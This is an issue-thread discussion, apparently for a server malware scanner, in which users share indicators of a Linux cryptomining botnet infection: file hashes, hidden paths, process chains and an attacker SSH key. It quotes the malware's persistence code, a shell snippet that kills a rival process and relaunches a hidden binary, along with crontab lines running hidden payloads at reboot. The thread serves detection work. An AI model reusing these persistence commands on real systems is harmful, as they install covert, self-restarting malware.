JQuags
commented
2 years ago Going to add to this open one for something new found:
8e08c7c440bf9f5380dd614238fa2d38 [bioset] 241cd0489ce1d5907572b9606322735a conf 664035124a33cb4ac6aac67157f5244a update
process
- root 706033 0.0 0.0 6628 5624 ? S 06:25 0:00 [bioset]
Hidden with in /etc/selinux/targeted/plugins
additionally in the man-db cron in /etc/cron.daily
pidk=$(ps aux | grep bioset | grep -v grep | grep -v '0.0\s0.0\s0' | awk '{print $2}') kill -9 $pidk > /dev/null 2>&1 cd /etc/selinux/targeted/plugins PATH=$PATH:$PWD nohup [bioset] >/dev/null 2>&1&
cPanelPeter
Process runs in a chain like: -go(992271)---timeout(376718)---tsm(376719)---tsm(376724)-+-{tsm}(376725)
Location can vary from /dev/shm or /tmp - sometimes in /root/.configrc.
64b9584e5ca7d5c4980bd72e63718b634a8912d4dc123de940db36dd111931ae /dev/shm/.X867123/.rsync/a/kswapd0 0f754eab280e5ff0b65c46bdd1cc16e8aff944c834379df2632cd5f261afe3bb /dev/shm/.X867123/.rsync/c/lib/64/tsm
0f754eab280e5ff0b65c46bdd1cc16e8aff944c834379df2632cd5f261afe3bb /tmp/.X2ss-unix/.rsync/c/lib/64/tsm e0ebf578cd13fee0b79ea7cd72769cf99677557f389920270034ff71fbb7da5f /tmp/.X2ss-unix/dota3.tar.gz
Cron doesn't vary much except based on the user: 1 1 /2 /home/admin/.configrc/a/upd>/dev/null 2>&1 @reboot /home/admin/.configrc/a/upd>/dev/null 2>&1 5 8 0 /home/admin/.configrc/b/sync>/dev/null 2>&1 @reboot /home/admin/.configrc/b/sync>/dev/null 2>&1 0 0 /3 /tmp/.X2ss-unix/.rsync/c/aptitude>/dev/null 2>&1
root would be in /root/.configrc
SSH key placed on the system is already detected by csi (mdrfckr)